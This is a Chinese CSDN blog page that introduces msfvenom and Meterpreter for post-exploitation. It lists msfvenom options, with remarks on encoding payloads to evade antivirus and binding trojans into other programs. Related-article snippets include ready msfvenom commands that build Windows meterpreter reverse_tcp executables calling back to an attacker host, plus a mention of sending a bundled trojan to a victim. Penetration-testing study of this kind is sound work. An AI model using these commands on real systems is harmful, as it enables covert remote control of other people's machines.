MSF之Msfvenom+Meterpreter

最新推荐文章于 2024-07-03 18:59:45 发布
最新推荐文章于 2024-07-03 18:59:45 发布
阅读量4.1k 收藏 31
点赞数 4
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csacs/article/details/99337728
版权
本文介绍了如何使用MSFvenom生成各种版本的木马程序,并通过Meterpreter进行后渗透攻击。通过设置路由和使用代理,可以访问内网其他网段,同时讨论了创建持久性后门的方法。
摘要由CSDN通过智能技术生成

MSF之Msfvenom+Meterpreter

太极生两仪,两仪生四象,
四象生八卦,八卦衍万物。
然后呢?
万物不如你!

Msfvenom:

msfvenom是msfpayload,msfencode的结合体,它的优点是单一命令行和效率.利用msfvenom生成各种版本木马程序,并在目标机上执行,在本地监听上线,执行攻击。

Options:
-p, --payload 指定需要使用的payload。使用自定义的payload,请使用-;或者stdin指定
-l, --list  列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled 为payload预先指定一个NOP滑动长度
-f, --format  指定输出格式
-e, --encoder 指定需要使用的编码
-a, --arch 指定payload的目标架构 x64 x86
–platform 指定payload的目标平台
-s, --space 设定有效攻击荷载的最大长度
-b, --bad-chars 设定规避字符集,比如: & #039;\x00\xff& #039;
-i, --iterations 指定payload的编码次数,绕杀毒
-c, --add-code 指定一个附加的win32 shellcode文件
-x, --template  指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
–payload-options 列举payload的标准选项
-o, --out  保存payload
-v, --var-name 指定一个自定义的变量,以确定输出格式
–shellest 最小化生成payload

最常使用的也就是 –f –o –p –I –e -x
-f (msfvenom –format查看)也就是指定生成文件格式,如图
在这里插入图片描述在这里插入图片描述

-o 输出位置,在捆绑木马时候,可以重定向。
-p 使用哪个payload
-i 把payload编码几次,次数越多免杀效果提高,随之失效性也变大
-e 使用哪个编码进行混淆免杀
-x 捆绑也做好的木马,-o只定被捆绑软件
查看可以利用的payload(编码/所有)
msfvenom -l payloads(encoders /all)

最低0.47元/天 解锁文章
SoulCat.
关注
专栏目录
后门战神,Msfvenom教程
大河之犬的博客
12-27 1051
Msfvenom主要用来生成带后门的软件MsfvenomMsfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencodewindows的安装很简单,直接运行安装文件即可,验证安装:接着输入msfconsole会提示你是否建立一个数据库:大功告成!
2021-08-19 msfvenom+meterpreter
白嫖怪的博客
08-19 395
MSF-Msfvenom +Meterpreter //稍微学习一会,然后就去睡觉 Msfvenom: msfvenommsfpayload,msfencode 的结合体,它的优点就在于能执行单一命令,利用 msfvenom 生成各种版本木马程序,并在目标机上执行,在本地监听上线,执行攻击。 Options: -p, --payload 指定需要使用的payload。使用自定义的payload,请使用- ; 或者stdin指定 -l, --list 列出指定模块的所有可用资源. 模块类型包括: pa
c语言msf,Metasploit应用笔记-msfvenom生成meterpreter后门代码
weixin_34564735的博客
05-21 773
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c语言格式。...
利用msfvenom制作windows木马及免杀马
最新发布
aheyor的博客
07-03 939
注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。原文链接:https://blog.csdn.net/qq_43332640/article/details/124072802。第四步:将生成的捆绑木马发到windows主机,并且打开msf的监听模块。第二步:打开kali启动msfvenom,制作木马。第三步:木马捆绑,(主程序启动之后子程序随之启动)
maven项目打war包
Handsome丶Boy
03-19 105
    maven项目打war包总结下 1.eclipse插件打包(package)  点击看看 这篇文章讲的很详细,再次不赘述 2.命令行打包(mvn package) 看看这篇文章 3.eclipse进行普通的打包 export---war ...
Msfvenom-命令-总结大全--
爱我非你莫属的博客
10-05 1686
Msfvenom命令 -p (–payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) -l 查看所有payload encoder nops。 -f (–help-formats) 输出文件格式。 (- -hel
maven 打war包
蜗牛爬行的博客
01-22 492
配置 你的pom.xml文件,在你的overview视窗里 配置 packaging为 war 然后 然后点击 pom.xml右键,run as 选择 install 或是 package 如果项目没问题,配置没问题 就会在项目的target 的目录里生成 war文件,   作为笔记,一下只针对本项目 替换images下所有文件
msfmsfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3981
msfvenom的使用
msf+mysql+弱口令爆破_内网渗透 | 手把手教你如何进行内网渗透
weixin_42347357的博客
01-27 1484
文章目录结构0x01 DMZ渗透首页看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin后台尝试爆破弱口令admin1234但是找了一圈并没有发现有什么可以利用的,网上有一个反序列化的洞可以用。exp上面呢,就是利用exp将一句话写入当前目录的shellx.php中。get shell到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。0x02 跳板及内...
python调用msf_MSF利用python反弹shell-Bypass AV
weixin_39883079的博客
11-30 1619
本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shellmsf-python反弹shell姿势11) msfvenom生成python后门msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LPORT=...
msfvenom手册
xxx9686的博客
09-17 515
基于各类web脚本,对于此类的web脚本触发执行方法非常简单,直接在url中访问该脚本即可。基于其它各类脚本的payload,说几个实战中可能会碰到的语言环境。
通过Maven远程部署war包
qq_44929168的博客
06-06 413
使用 Maven 进行远程部署和热部署到 Tomcat 服务器,可以通过 Maven 插件来实现。以下是使用插件的详细步骤。
msfvenom常用payload
ITgougou_的博客
12-24 440
payload命令 windows: msfvenom-a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe mac: msfvenom-...
Metasploit应用笔记-msfvenom生成meterpreter后门代码
热门推荐
oneVs1的专栏
02-28 1万+
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3364
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenommsfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
metasploit之msfvenom
Yale的博客
01-31 2493
先来看看msfvenom的帮助菜单 我们先来看一个示例 使用Msfvenom生成一个windows下的绑定shell的shellcode,使用shikata_ga_nai编码器,迭代编码了三次,过滤了null字符,使用python格式 我们可以使用-platform指定很多平台,上面的例子指定的是windows下的,我们同样也可以指定cisco,os x,solaris,bsd等 使用—hel...
msfvenom 基本使用
blackguest07的博客
03-05 1575
msfvenom 基础命令
kali的msfvenom
07-27
kali的msfvenom是一个Metasploit的独立后门生成器,也是msfpayload和msfencode的替代品。它可以用来生成各种类型的后门,包括Windows平台上的meterpreter反向TCP连接后门。使用msfvenom可以通过指定参数来生成特定类型的后门,并将其保存为可执行文件。例如,可以使用以下命令生成一个meterpreter反向TCP连接后门,并将其保存为名为mymalware.exe的可执行文件:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.129 lport=6789 -f exe > mymalware.exe。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [Kali利用msf渗透Windows电脑(超详细)](https://blog.csdn.net/RFZ_322/article/details/123367668)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [[Kali]--Msfvenom](https://blog.csdn.net/weixin_42633229/article/details/109535621)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值